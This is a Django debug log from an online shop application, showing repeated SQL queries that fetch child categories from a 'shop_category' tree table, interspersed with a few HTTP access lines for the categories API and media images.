SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:45:18,166 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:45:18,168 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:45:18,170 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 06:45:18,173 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:45:18,175 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:45:18,178 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:45:18,181 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:45:18,183 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:45:18,185 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:45:18,187 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:45:18,189 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 06:45:18,193 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:45:18,195 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:45:18,197 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:45:18,199 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:45:18,201 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:45:18,205 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:45:18,207 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:45:18,209 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:45:18,211 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 06:45:18,213 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:45:18,217 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:45:18,219 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:45:18,222 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:45:18,224 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:45:18,226 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:45:18,228 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:45:18,231 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:45:18,233 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:45:18,235 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:45:18,238 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:45:18,240 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:45:18] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 06:45:18] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 06:45:18] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [27/Dec/2019 06:47:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 06:47:06,141 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:47:06,153 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:47:06,161 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:47:06,165 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:47:06,170 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:47:06,174 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:47:06,178 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:47:06,182 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:47:06,186 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:47:06,192 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:47:06,196 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:47:06,200 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:47:06,204 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:47:06,208 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:47:06,217 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:47:06,221 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:47:06,225 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 06:47:06,229 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:47:06,235 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:47:06,243 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:47:06,247 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:47:06,252 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:47:06,256 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:47:06,260 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:47:06,265 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 06:47:06,271 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:47:06,275 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:47:06,279 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:47:06,284 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:47:06,288 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:47:06,294 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:47:06,298 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:47:06,302 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:47:06,306 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 